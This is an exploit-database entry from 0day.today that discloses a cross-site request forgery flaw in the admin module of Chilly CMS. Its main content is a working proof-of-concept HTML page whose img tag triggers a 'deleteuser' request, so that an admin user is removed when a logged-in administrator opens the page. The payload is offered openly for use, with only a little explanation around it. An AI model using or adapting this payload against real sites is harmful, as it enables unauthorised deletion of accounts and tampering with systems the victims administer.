Chilly CMS CSRF Vulnerability

2010-03-16T00:00:00
ID 1337DAY-ID-9671
Type zdt
Reporter Pratul Agrawal
Modified 2010-03-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================
Chilly CMS CSRF Vulnerability
=============================

 # Vulnerability found in- Admin module
   
  # email         [email protected]
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      chilly_CMS

  # Category  	  CMS / Portals
  
  # Site p4ge     http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php
  
  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://www.opensourcecms.com/demo/2/292/chillyCMS
  
 
   Script to Delete the Admin user through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>
 
                          <body>
 
                              <img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
 
                          </body>
 
                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.




#  0day.today [2018-03-28]  #